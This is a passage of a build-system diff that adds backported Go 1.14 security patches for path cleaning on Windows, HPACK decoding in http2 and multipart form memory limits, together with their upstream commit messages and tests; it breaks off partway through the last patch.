@@ -0,0 +1,53 @@
1From 94e0c36694fb044e81381d112fef3692de7cdf52 Mon Sep 17 00:00:00 2001
2From: Yasuhiro Matsumoto <mattn.jp@gmail.com>
3Date: Fri, 22 Apr 2022 10:07:51 +0900
4Subject: [PATCH 1/2] path/filepath: do not remove prefix "." when following
5 path contains ":".
6
7Fixes #52476
8
9Change-Id: I9eb72ac7dbccd6322d060291f31831dc389eb9bb
10Reviewed-on: https://go-review.googlesource.com/c/go/+/401595
11Auto-Submit: Ian Lance Taylor <iant@google.com>
12Reviewed-by: Alex Brainman <alex.brainman@gmail.com>
13Run-TryBot: Ian Lance Taylor <iant@google.com>
14Reviewed-by: Ian Lance Taylor <iant@google.com>
15Reviewed-by: Damien Neil <dneil@google.com>
16TryBot-Result: Gopher Robot <gobot@golang.org>
17
18Upstream-Status: Backport from https://github.com/golang/go/commit/9cd1818a7d019c02fa4898b3e45a323e35033290
19CVE: CVE-2022-41722
20Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
21---
22 src/path/filepath/path.go | 14 +++++++++++++-
23 1 file changed, 13 insertions(+), 1 deletion(-)
24
25diff --git a/src/path/filepath/path.go b/src/path/filepath/path.go
26index 26f1833..92dc090 100644
27--- a/src/path/filepath/path.go
28+++ b/src/path/filepath/path.go
29@@ -116,9 +116,21 @@ func Clean(path string) string {
30 case os.IsPathSeparator(path[r]):
31 // empty path element
32 r++
33- case path[r] == '.' && (r+1 == n || os.IsPathSeparator(path[r+1])):
34+ case path[r] == '.' && r+1 == n:
35 // . element
36 r++
37+ case path[r] == '.' && os.IsPathSeparator(path[r+1]):
38+ // ./ element
39+ r++
40+
41+ for r < len(path) && os.IsPathSeparator(path[r]) {
42+ r++
43+ }
44+ if out.w == 0 && volumeNameLen(path[r:]) > 0 {
45+ // When joining prefix "." and an absolute path on Windows,
46+ // the prefix should not be removed.
47+ out.append('.')
48+ }
49 case path[r] == '.' && path[r+1] == '.' && (r+2 == n || os.IsPathSeparator(path[r+2])):
50 // .. element: remove to last separator
51 r += 2
52--
532.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-2.patch
new file mode 100644
index 0000000000..e1f7a55581
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-2.patch
@@ -0,0 +1,104 @@
1From b8803cb711ae163b8e67897deb6cf8c49702227c Mon Sep 17 00:00:00 2001
2From: Damien Neil <dneil@google.com>
3Date: Mon, 12 Dec 2022 16:43:37 -0800
4Subject: [PATCH 2/2] path/filepath: do not Clean("a/../c:/b") into c:\b on
5 Windows
6
7Do not permit Clean to convert a relative path into one starting
8with a drive reference. This change causes Clean to insert a .
9path element at the start of a path when the original path does not
10start with a volume name, and the first path element would contain
11a colon.
12
13This may introduce a spurious but harmless . path element under
14some circumstances. For example, Clean("a/../b:/../c") becomes `.\c`.
15
16This reverts CL 401595, since the change here supersedes the one
17in that CL.
18
19Thanks to RyotaK (https://twitter.com/ryotkak) for reporting this issue.
20
21Updates #57274
22Fixes #57276
23Fixes CVE-2022-41722
24
25Change-Id: I837446285a03aa74c79d7642720e01f354c2ca17
26Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1675249
27Reviewed-by: Roland Shoemaker <bracewell@google.com>
28Run-TryBot: Damien Neil <dneil@google.com>
29Reviewed-by: Julie Qiu <julieqiu@google.com>
30TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
31(cherry picked from commit 8ca37f4813ef2f64600c92b83f17c9f3ca6c03a5)
32Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1728944
33Run-TryBot: Roland Shoemaker <bracewell@google.com>
34Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
35Reviewed-by: Damien Neil <dneil@google.com>
36Reviewed-on: https://go-review.googlesource.com/c/go/+/468119
37Reviewed-by: Than McIntosh <thanm@google.com>
38Run-TryBot: Michael Pratt <mpratt@google.com>
39TryBot-Result: Gopher Robot <gobot@golang.org>
40Auto-Submit: Michael Pratt <mpratt@google.com>
41
42Upstream-Status: Backport from https://github.com/golang/go/commit/bdf07c2e168baf736e4c057279ca12a4d674f18c
43CVE: CVE-2022-41722
44Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
45---
46 src/path/filepath/path.go | 27 ++++++++++++++-------------
47 1 file changed, 14 insertions(+), 13 deletions(-)
48
49diff --git a/src/path/filepath/path.go b/src/path/filepath/path.go
50index 92dc090..f0f095e 100644
51--- a/src/path/filepath/path.go
52+++ b/src/path/filepath/path.go
53@@ -14,6 +14,7 @@ package filepath
54 import (
55 "errors"
56 "os"
57+ "runtime"
58 "sort"
59 "strings"
60 )
61@@ -116,21 +117,9 @@ func Clean(path string) string {
62 case os.IsPathSeparator(path[r]):
63 // empty path element
64 r++
65- case path[r] == '.' && r+1 == n:
66+ case path[r] == '.' && (r+1 == n || os.IsPathSeparator(path[r+1])):
67 // . element
68 r++
69- case path[r] == '.' && os.IsPathSeparator(path[r+1]):
70- // ./ element
71- r++
72-
73- for r < len(path) && os.IsPathSeparator(path[r]) {
74- r++
75- }
76- if out.w == 0 && volumeNameLen(path[r:]) > 0 {
77- // When joining prefix "." and an absolute path on Windows,
78- // the prefix should not be removed.
79- out.append('.')
80- }
81 case path[r] == '.' && path[r+1] == '.' && (r+2 == n || os.IsPathSeparator(path[r+2])):
82 // .. element: remove to last separator
83 r += 2
84@@ -156,6 +145,18 @@ func Clean(path string) string {
85 if rooted && out.w != 1 || !rooted && out.w != 0 {
86 out.append(Separator)
87 }
88+ // If a ':' appears in the path element at the start of a Windows path,
89+ // insert a .\ at the beginning to avoid converting relative paths
90+ // like a/../c: into c:.
91+ if runtime.GOOS == "windows" && out.w == 0 && out.volLen == 0 && r != 0 {
92+ for i := r; i < n && !os.IsPathSeparator(path[i]); i++ {
93+ if path[i] == ':' {
94+ out.append('.')
95+ out.append(Separator)
96+ break
97+ }
98+ }
99+ }
100 // copy element
101 for ; r < n && !os.IsPathSeparator(path[r]); r++ {
102 out.append(path[r])
103--
1042.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41723.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41723.patch
new file mode 100644
index 0000000000..a93fa31dcd
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41723.patch
@@ -0,0 +1,156 @@
1From 451766789f646617157c725e20c955d4a9a70d4e Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <bracewell@google.com>
3Date: Mon, 6 Feb 2023 10:03:44 -0800
4Subject: [PATCH] net/http: update bundled golang.org/x/net/http2
5
6Disable cmd/internal/moddeps test, since this update includes PRIVATE
7track fixes.
8
9Fixes CVE-2022-41723
10Fixes #58355
11Updates #57855
12
13Change-Id: Ie870562a6f6e44e4e8f57db6a0dde1a41a2b090c
14Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1728939
15Reviewed-by: Damien Neil <dneil@google.com>
16Reviewed-by: Julie Qiu <julieqiu@google.com>
17Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
18Run-TryBot: Roland Shoemaker <bracewell@google.com>
19Reviewed-on: https://go-review.googlesource.com/c/go/+/468118
20TryBot-Result: Gopher Robot <gobot@golang.org>
21Run-TryBot: Michael Pratt <mpratt@google.com>
22Auto-Submit: Michael Pratt <mpratt@google.com>
23Reviewed-by: Than McIntosh <thanm@google.com>
24
25Upstream-Status: Backport [https://github.com/golang/go/commit/5c3e11bd0b5c0a86e5beffcd4339b86a902b21c3]
26CVE: CVE-2022-41723
27Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
28---
29 src/vendor/golang.org/x/net/http2/hpack/hpack.go | 79 +++++++++++++++---------
30 1 file changed, 49 insertions(+), 30 deletions(-)
31
32diff --git a/src/vendor/golang.org/x/net/http2/hpack/hpack.go b/src/vendor/golang.org/x/net/http2/hpack/hpack.go
33index 85f18a2..02e80e3 100644
34--- a/src/vendor/golang.org/x/net/http2/hpack/hpack.go
35+++ b/src/vendor/golang.org/x/net/http2/hpack/hpack.go
36@@ -359,6 +359,7 @@ func (d *Decoder) parseFieldLiteral(n uint8, it indexType) error {
37
38 var hf HeaderField
39 wantStr := d.emitEnabled || it.indexed()
40+ var undecodedName undecodedString
41 if nameIdx > 0 {
42 ihf, ok := d.at(nameIdx)
43 if !ok {
44@@ -366,15 +367,27 @@ func (d *Decoder) parseFieldLiteral(n uint8, it indexType) error {
45 }
46 hf.Name = ihf.Name
47 } else {
48- hf.Name, buf, err = d.readString(buf, wantStr)
49+ undecodedName, buf, err = d.readString(buf)
50 if err != nil {
51 return err
52 }
53 }
54- hf.Value, buf, err = d.readString(buf, wantStr)
55+ undecodedValue, buf, err := d.readString(buf)
56 if err != nil {
57 return err
58 }
59+ if wantStr {
60+ if nameIdx <= 0 {
61+ hf.Name, err = d.decodeString(undecodedName)
62+ if err != nil {
63+ return err
64+ }
65+ }
66+ hf.Value, err = d.decodeString(undecodedValue)
67+ if err != nil {
68+ return err
69+ }
70+ }
71 d.buf = buf
72 if it.indexed() {
73 d.dynTab.add(hf)
74@@ -459,46 +472,52 @@ func readVarInt(n byte, p []byte) (i uint64, remain []byte, err error) {
75 return 0, origP, errNeedMore
76 }
77
78-// readString decodes an hpack string from p.
79+// readString reads an hpack string from p.
80 //
81-// wantStr is whether s will be used. If false, decompression and
82-// []byte->string garbage are skipped if s will be ignored
83-// anyway. This does mean that huffman decoding errors for non-indexed
84-// strings past the MAX_HEADER_LIST_SIZE are ignored, but the server
85-// is returning an error anyway, and because they're not indexed, the error
86-// won't affect the decoding state.
87-func (d *Decoder) readString(p []byte, wantStr bool) (s string, remain []byte, err error) {
88+// It returns a reference to the encoded string data to permit deferring decode costs
89+// until after the caller verifies all data is present.
90+func (d *Decoder) readString(p []byte) (u undecodedString, remain []byte, err error) {
91 if len(p) == 0 {
92- return "", p, errNeedMore
93+ return u, p, errNeedMore
94 }
95 isHuff := p[0]&128 != 0
96 strLen, p, err := readVarInt(7, p)
97 if err != nil {
98- return "", p, err
99+ return u, p, err
100 }
101 if d.maxStrLen != 0 && strLen > uint64(d.maxStrLen) {
102- return "", nil, ErrStringLength
103+ // Returning an error here means Huffman decoding errors
104+ // for non-indexed strings past the maximum string length
105+ // are ignored, but the server is returning an error anyway
106+ // and because the string is not indexed the error will not
107+ // affect the decoding state.
108+ return u, nil, ErrStringLength
109 }
110 if uint64(len(p)) < strLen {
111- return "", p, errNeedMore
112- }
113- if !isHuff {
114- if wantStr {
115- s = string(p[:strLen])
116- }
117- return s, p[strLen:], nil
118+ return u, p, errNeedMore
119 }
120+ u.isHuff = isHuff
121+ u.b = p[:strLen]
122+ return u, p[strLen:], nil
123+}
124
125- if wantStr {
126- buf := bufPool.Get().(*bytes.Buffer)
127- buf.Reset() // don't trust others
128- defer bufPool.Put(buf)
129- if err := huffmanDecode(buf, d.maxStrLen, p[:strLen]); err != nil {
130- buf.Reset()
131- return "", nil, err
132- }
133+type undecodedString struct {
134+ isHuff bool
135+ b []byte
136+}
137+
138+func (d *Decoder) decodeString(u undecodedString) (string, error) {
139+ if !u.isHuff {
140+ return string(u.b), nil
141+ }
142+ buf := bufPool.Get().(*bytes.Buffer)
143+ buf.Reset() // don't trust others
144+ var s string
145+ err := huffmanDecode(buf, d.maxStrLen, u.b)
146+ if err == nil {
147 s = buf.String()
148- buf.Reset() // be nice to GC
149 }
150- return s, p[strLen:], nil
151+ buf.Reset() // be nice to GC
152+ bufPool.Put(buf)
153+ return s, err
154 }
155--
1562.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre1.patch
new file mode 100644
index 0000000000..37ebc41947
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre1.patch
@@ -0,0 +1,85 @@
1From 874b3132a84cf76da6a48978826c04c380a37a50 Mon Sep 17 00:00:00 2001
2From: avivklas <avivklas@gmail.com>
3Date: Fri, 7 Aug 2020 21:50:12 +0300
4Subject: [PATCH] mime/multipart: return overflow errors in Reader.ReadForm
5
6Updates Reader.ReadForm to check for overflow errors that may
7result from a leeway addition of 10MiB to the input argument
8maxMemory.
9
10Fixes #40430
11
12Change-Id: I510b8966c95c51d04695ba9d08fcfe005fd11a5d
13Reviewed-on: https://go-review.googlesource.com/c/go/+/247477
14Run-TryBot: Emmanuel Odeke <emm.odeke@gmail.com>
15Trust: Cuong Manh Le <cuong.manhle.vn@gmail.com>
16Trust: Emmanuel Odeke <emm.odeke@gmail.com>
17TryBot-Result: Go Bot <gobot@golang.org>
18Reviewed-by: Emmanuel Odeke <emm.odeke@gmail.com>
19
20Upstream-Status: Backport [https://github.com/golang/go/commit/874b3132a84cf76da6a48978826c04c380a37a50]
21CVE: CVE-2022-41725 #Dependency Patch1
22Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
23---
24 src/mime/multipart/formdata.go | 4 ++++
25 src/mime/multipart/formdata_test.go | 18 ++++++++++++++++++
26 2 files changed, 22 insertions(+)
27
28diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
29index 832d0ad693666..4eb31012941ac 100644
30--- a/src/mime/multipart/formdata.go
31+++ b/src/mime/multipart/formdata.go
32@@ -7,6 +7,7 @@ package multipart
33 import (
34 "bytes"
35 "errors"
36+ "fmt"
37 "io"
38 "io/ioutil"
39 "net/textproto"
40@@ -41,6 +42,9 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
41
42 // Reserve an additional 10 MB for non-file parts.
43 maxValueBytes := maxMemory + int64(10<<20)
44+ if maxValueBytes <= 0 {
45+ return nil, fmt.Errorf("multipart: integer overflow from maxMemory(%d) + 10MiB for non-file parts", maxMemory)
46+ }
47 for {
48 p, err := r.NextPart()
49 if err == io.EOF {
50diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
51index 7d756c8c244a0..7112e0d3727fe 100644
52--- a/src/mime/multipart/formdata_test.go
53+++ b/src/mime/multipart/formdata_test.go
54@@ -7,6 +7,7 @@ package multipart
55 import (
56 "bytes"
57 "io"
58+ "math"
59 "os"
60 "strings"
61 "testing"
62@@ -52,6 +53,23 @@ func TestReadFormWithNamelessFile(t *testing.T) {
63 }
64 }
65
66+// Issue 40430: Ensure that we report integer overflows in additions of maxMemory,
67+// instead of silently and subtly failing without indication.
68+func TestReadFormMaxMemoryOverflow(t *testing.T) {
69+ b := strings.NewReader(strings.ReplaceAll(messageWithTextContentType, "\n", "\r\n"))
70+ r := NewReader(b, boundary)
71+ f, err := r.ReadForm(math.MaxInt64)
72+ if err == nil {
73+ t.Fatal("Unexpected a non-nil error")
74+ }
75+ if f != nil {
76+ t.Fatalf("Unexpected returned a non-nil form: %v\n", f)
77+ }
78+ if g, w := err.Error(), "integer overflow from maxMemory"; !strings.Contains(g, w) {
79+ t.Errorf(`Error mismatch\n%q\ndid not contain\n%q`, g, w)
80+ }
81+}
82+
83 func TestReadFormWithTextContentType(t *testing.T) {
84 // From https://github.com/golang/go/issues/24041
85 b := strings.NewReader(strings.ReplaceAll(messageWithTextContentType, "\n", "\r\n"))
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre2.patch
new file mode 100644
index 0000000000..b951ee893e
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre2.patch
@@ -0,0 +1,97 @@
1From 4e5a313524da62600eb59dbf98624cfe946456f8 Mon Sep 17 00:00:00 2001
2From: Emmanuel T Odeke <emmanuel@orijtech.com>
3Date: Tue, 20 Oct 2020 04:11:12 -0700
4Subject: [PATCH] net/http: test that ParseMultipartForm catches overflows
5
6Tests that if the combination of:
7* HTTP multipart file payload size
8* ParseMultipartForm's maxMemory parameter
9* the internal leeway buffer size of 10MiB
10
11overflows, then we'll report an overflow instead of silently
12passing.
13
14Reapplies and fixes CL 254977, which was reverted in CL 263658.
15
16The prior test lacked a res.Body.Close(), so fixed that and
17added a leaked Transport check to verify correctness.
18
19Updates 40430.
20
21Change-Id: I3c0f7ef43d621f6eb00f07755f04f9f36c51f98f
22Reviewed-on: https://go-review.googlesource.com/c/go/+/263817
23Run-TryBot: Emmanuel Odeke <emm.odeke@gmail.com>
24TryBot-Result: Go Bot <gobot@golang.org>
25Reviewed-by: Bryan C. Mills <bcmills@google.com>
26Trust: Damien Neil <dneil@google.com>
27
28Upstream-Status: Backport [https://github.com/golang/go/commit/4e5a313524da62600eb59dbf98624cfe946456f8]
29CVE: CVE-2022-41725 #Dependency Patch2
30Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
31---
32 src/net/http/request_test.go | 45 ++++++++++++++++++++++++++++++++++++
33 1 file changed, 45 insertions(+)
34
35diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
36index b4ef472e71229..19526b9ad791a 100644
37--- a/src/net/http/request_test.go
38+++ b/src/net/http/request_test.go
39@@ -13,6 +13,7 @@ import (
40 "fmt"
41 "io"
42 "io/ioutil"
43+ "math"
44 "mime/multipart"
45 . "net/http"
46 "net/http/httptest"
47@@ -245,6 +246,50 @@ func TestParseMultipartForm(t *testing.T) {
48 }
49 }
50
51+// Issue #40430: Test that if maxMemory for ParseMultipartForm when combined with
52+// the payload size and the internal leeway buffer size of 10MiB overflows, that we
53+// correctly return an error.
54+func TestMaxInt64ForMultipartFormMaxMemoryOverflow(t *testing.T) {
55+ defer afterTest(t)
56+
57+ payloadSize := 1 << 10
58+ cst := httptest.NewServer(HandlerFunc(func(rw ResponseWriter, req *Request) {
59+ // The combination of:
60+ // MaxInt64 + payloadSize + (internal spare of 10MiB)
61+ // triggers the overflow. See issue https://golang.org/issue/40430/
62+ if err := req.ParseMultipartForm(math.MaxInt64); err != nil {
63+ Error(rw, err.Error(), StatusBadRequest)
64+ return
65+ }
66+ }))
67+ defer cst.Close()
68+ fBuf := new(bytes.Buffer)
69+ mw := multipart.NewWriter(fBuf)
70+ mf, err := mw.CreateFormFile("file", "myfile.txt")
71+ if err != nil {
72+ t.Fatal(err)
73+ }
74+ if _, err := mf.Write(bytes.Repeat([]byte("abc"), payloadSize)); err != nil {
75+ t.Fatal(err)
76+ }
77+ if err := mw.Close(); err != nil {
78+ t.Fatal(err)
79+ }
80+ req, err := NewRequest("POST", cst.URL, fBuf)
81+ if err != nil {
82+ t.Fatal(err)
83+ }
84+ req.Header.Set("Content-Type", mw.FormDataContentType())
85+ res, err := cst.Client().Do(req)
86+ if err != nil {
87+ t.Fatal(err)
88+ }
89+ res.Body.Close()
90+ if g, w := res.StatusCode, StatusBadRequest; g != w {
91+ t.Fatalf("Status code mismatch: got %d, want %d", g, w)
92+ }
93+}
94+
95 func TestRedirect_h1(t *testing.T) { testRedirect(t, h1Mode) }
96 func TestRedirect_h2(t *testing.T) { testRedirect(t, h2Mode) }
97 func testRedirect(t *testing.T, h2 bool) {
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre3.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre3.patch
new file mode 100644
index 0000000000..767225b888
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre3.patch
@@ -0,0 +1,98 @@
1From 5246fa5e75b129a7dbd9722aa4de0cbaf7ceae43 Mon Sep 17 00:00:00 2001
2From: Russ Cox <rsc@golang.org>
3Date: Thu, 3 Dec 2020 09:45:07 -0500
4Subject: [PATCH] mime/multipart: handle ReadForm(math.MaxInt64) better
5
6Returning an error about integer overflow is needlessly pedantic.
7The meaning of ReadForm(MaxInt64) is easily understood
8(accept a lot of data) and can be implemented.
9
10Fixes #40430.
11
12Change-Id: I8a522033dd9a2f9ad31dd2ad82cf08d553736ab9
13Reviewed-on: https://go-review.googlesource.com/c/go/+/275112
14Trust: Russ Cox <rsc@golang.org>
15Run-TryBot: Russ Cox <rsc@golang.org>
16TryBot-Result: Go Bot <gobot@golang.org>
17Reviewed-by: Ian Lance Taylor <iant@golang.org>
18
19Upstream-Status: Backport [https://github.com/golang/go/commit/5246fa5e75b129a7dbd9722aa4de0cbaf7ceae43]
20CVE: CVE-2022-41725 #Dependency Patch3
21Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
22---
23 src/mime/multipart/formdata.go | 8 ++++++--
24 src/mime/multipart/formdata_test.go | 14 +++++---------
25 src/net/http/request_test.go | 2 +-
26 3 files changed, 12 insertions(+), 12 deletions(-)
27
28diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
29index 4eb31012941ac..9c42ea8c023b5 100644
30--- a/src/mime/multipart/formdata.go
31+++ b/src/mime/multipart/formdata.go
32@@ -7,9 +7,9 @@ package multipart
33 import (
34 "bytes"
35 "errors"
36- "fmt"
37 "io"
38 "io/ioutil"
39+ "math"
40 "net/textproto"
41 "os"
42 )
43@@ -43,7 +43,11 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
44 // Reserve an additional 10 MB for non-file parts.
45 maxValueBytes := maxMemory + int64(10<<20)
46 if maxValueBytes <= 0 {
47- return nil, fmt.Errorf("multipart: integer overflow from maxMemory(%d) + 10MiB for non-file parts", maxMemory)
48+ if maxMemory < 0 {
49+ maxValueBytes = 0
50+ } else {
51+ maxValueBytes = math.MaxInt64
52+ }
53 }
54 for {
55 p, err := r.NextPart()
56diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
57index 7112e0d3727fe..e3a3a3eae8e15 100644
58--- a/src/mime/multipart/formdata_test.go
59+++ b/src/mime/multipart/formdata_test.go
60@@ -53,20 +53,16 @@ func TestReadFormWithNamelessFile(t *testing.T) {
61 }
62 }
63
64-// Issue 40430: Ensure that we report integer overflows in additions of maxMemory,
65-// instead of silently and subtly failing without indication.
66+// Issue 40430: Handle ReadForm(math.MaxInt64)
67 func TestReadFormMaxMemoryOverflow(t *testing.T) {
68 b := strings.NewReader(strings.ReplaceAll(messageWithTextContentType, "\n", "\r\n"))
69 r := NewReader(b, boundary)
70 f, err := r.ReadForm(math.MaxInt64)
71- if err == nil {
72- t.Fatal("Unexpected a non-nil error")
73- }
74- if f != nil {
75- t.Fatalf("Unexpected returned a non-nil form: %v\n", f)
76+ if err != nil {
77+ t.Fatalf("ReadForm(MaxInt64): %v", err)
78 }
79- if g, w := err.Error(), "integer overflow from maxMemory"; !strings.Contains(g, w) {
80- t.Errorf(`Error mismatch\n%q\ndid not contain\n%q`, g, w)
81+ if f == nil {
82+ t.Fatal("ReadForm(MaxInt64): missing form")
83 }
84 }
85
86diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
87index 19526b9ad791a..689498e19d5dd 100644
88--- a/src/net/http/request_test.go
89+++ b/src/net/http/request_test.go
90@@ -285,7 +285,7 @@ func TestMaxInt64ForMultipartFormMaxMemoryOverflow(t *testing.T) {
91 t.Fatal(err)
92 }
93 res.Body.Close()
94- if g, w := res.StatusCode, StatusBadRequest; g != w {
95+ if g, w := res.StatusCode, StatusOK; g != w {
96 t.Fatalf("Status code mismatch: got %d, want %d", g, w)
97 }
98 }
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41725.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725.patch
new file mode 100644
index 0000000000..5f80c62b0b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725.patch
@@ -0,0 +1,660 @@
1From 5c55ac9bf1e5f779220294c843526536605f42ab Mon Sep 17 00:00:00 2001
2From: Damien Neil <dneil@google.com>
3Date: Wed, 25 Jan 2023 09:27:01 -0800
4Subject: [PATCH] [release-branch.go1.19] mime/multipart: limit memory/inode consumption of ReadForm
5
6Reader.ReadForm is documented as storing "up to maxMemory bytes + 10MB"
7in memory. Parsed forms can consume substantially more memory than
8this limit, since ReadForm does not account for map entry overhead
9and MIME headers.
10
11In addition, while the amount of disk memory consumed by ReadForm can
12be constrained by limiting the size of the parsed input, ReadForm will
13create one temporary file per form part stored on disk, potentially
14consuming a large number of inodes.
15
16Update ReadForm's memory accounting to include part names,
17MIME headers, and map entry overhead.
18
19Update ReadForm to store all on-disk file parts in a single
20temporary file.
21
22Files returned by FileHeader.Open are documented as having a concrete
23type of *os.File when a file is stored on disk. The change to use a
24single temporary file for all parts means that this is no longer the
25case when a form contains more than a single file part stored on disk.
26
27The previous behavior of storing each file part in a separate disk
28file may be reenabled with GODEBUG=multipartfiles=distinct.
29
30Update Reader.NextPart and Reader.NextRawPart to set a 10MiB cap
31on the size of MIME headers.
32
33Thanks to Jakob Ackermann (@das7pad) for reporting this issue.
34
35Updates #58006
36Fixes #58362
37Fixes CVE-2022-41725
38
39Change-Id: Ibd780a6c4c83ac8bcfd3cbe344f042e9940f2eab
40Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1714276
41Reviewed-by: Julie Qiu <julieqiu@google.com>
42TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
43Reviewed-by: Roland Shoemaker <bracewell@google.com>
44Run-TryBot: Damien Neil <dneil@google.com>
45(cherry picked from commit ed4664330edcd91b24914c9371c377c132dbce8c)
46Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1728949
47Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
48Run-TryBot: Roland Shoemaker <bracewell@google.com>
49Reviewed-by: Damien Neil <dneil@google.com>
50Reviewed-on: https://go-review.googlesource.com/c/go/+/468116
51TryBot-Result: Gopher Robot <gobot@golang.org>
52Reviewed-by: Than McIntosh <thanm@google.com>
53Run-TryBot: Michael Pratt <mpratt@google.com>
54Auto-Submit: Michael Pratt <mpratt@google.com>
55
56Upstream-Status: Backport [https://github.com/golang/go/commit/5c55ac9bf1e5f779220294c843526536605f42ab]
57CVE: CVE-2022-41725
58Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
59---
60 src/mime/multipart/formdata.go | 132 ++++++++++++++++++++-----
61 src/mime/multipart/formdata_test.go | 140 ++++++++++++++++++++++++++-
62 src/mime/multipart/multipart.go | 25 +++--
63 src/mime/multipart/readmimeheader.go | 14 +++
64 src/net/http/request_test.go | 2 +-
65 src/net/textproto/reader.go | 27 ++++++
66 6 files changed, 303 insertions(+), 37 deletions(-)
67 create mode 100644 src/mime/multipart/readmimeheader.go
68
69diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
70index 9c42ea8..1eeb340 100644
71--- a/src/mime/multipart/formdata.go
72+++ b/src/mime/multipart/formdata.go
73@@ -7,6 +7,7 @@ package multipart
74 import (
75 "bytes"
76 "errors"
77+ "internal/godebug"
78 "io"
79 "io/ioutil"
80 "math"
81@@ -34,23 +35,58 @@ func (r *Reader) ReadForm(maxMemory int64) (*Form, error) {
82
83 func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
84 form := &Form{make(map[string][]string), make(map[string][]*FileHeader)}
85+ var (
86+ file *os.File
87+ fileOff int64
88+ )
89+ numDiskFiles := 0
90+ multipartFiles := godebug.Get("multipartfiles")
91+ combineFiles := multipartFiles != "distinct"
92 defer func() {
93+ if file != nil {
94+ if cerr := file.Close(); err == nil {
95+ err = cerr
96+ }
97+ }
98+ if combineFiles && numDiskFiles > 1 {
99+ for _, fhs := range form.File {
100+ for _, fh := range fhs {
101+ fh.tmpshared = true
102+ }
103+ }
104+ }
105 if err != nil {
106 form.RemoveAll()
107+ if file != nil {
108+ os.Remove(file.Name())
109+ }
110 }
111 }()
112
113- // Reserve an additional 10 MB for non-file parts.
114- maxValueBytes := maxMemory + int64(10<<20)
115- if maxValueBytes <= 0 {
116+ // maxFileMemoryBytes is the maximum bytes of file data we will store in memory.
117+ // Data past this limit is written to disk.
118+ // This limit strictly applies to content, not metadata (filenames, MIME headers, etc.),
119+ // since metadata is always stored in memory, not disk.
120+ //
121+ // maxMemoryBytes is the maximum bytes we will store in memory, including file content,
122+ // non-file part values, metdata, and map entry overhead.
123+ //
124+ // We reserve an additional 10 MB in maxMemoryBytes for non-file data.
125+ //
126+ // The relationship between these parameters, as well as the overly-large and
127+ // unconfigurable 10 MB added on to maxMemory, is unfortunate but difficult to change
128+ // within the constraints of the API as documented.
129+ maxFileMemoryBytes := maxMemory
130+ maxMemoryBytes := maxMemory + int64(10<<20)
131+ if maxMemoryBytes <= 0 {
132 if maxMemory < 0 {
133- maxValueBytes = 0
134+ maxMemoryBytes = 0
135 } else {
136- maxValueBytes = math.MaxInt64
137+ maxMemoryBytes = math.MaxInt64
138 }
139 }
140 for {
141- p, err := r.NextPart()
142+ p, err := r.nextPart(false, maxMemoryBytes)
143 if err == io.EOF {
144 break
145 }
146@@ -64,16 +100,27 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
147 }
148 filename := p.FileName()
149
150+ // Multiple values for the same key (one map entry, longer slice) are cheaper
151+ // than the same number of values for different keys (many map entries), but
152+ // using a consistent per-value cost for overhead is simpler.
153+ maxMemoryBytes -= int64(len(name))
154+ maxMemoryBytes -= 100 // map overhead
155+ if maxMemoryBytes < 0 {
156+ // We can't actually take this path, since nextPart would already have
157+ // rejected the MIME headers for being too large. Check anyway.
158+ return nil, ErrMessageTooLarge
159+ }
160+
161 var b bytes.Buffer
162
163 if filename == "" {
164 // value, store as string in memory
165- n, err := io.CopyN(&b, p, maxValueBytes+1)
166+ n, err := io.CopyN(&b, p, maxMemoryBytes+1)
167 if err != nil && err != io.EOF {
168 return nil, err
169 }
170- maxValueBytes -= n
171- if maxValueBytes < 0 {
172+ maxMemoryBytes -= n
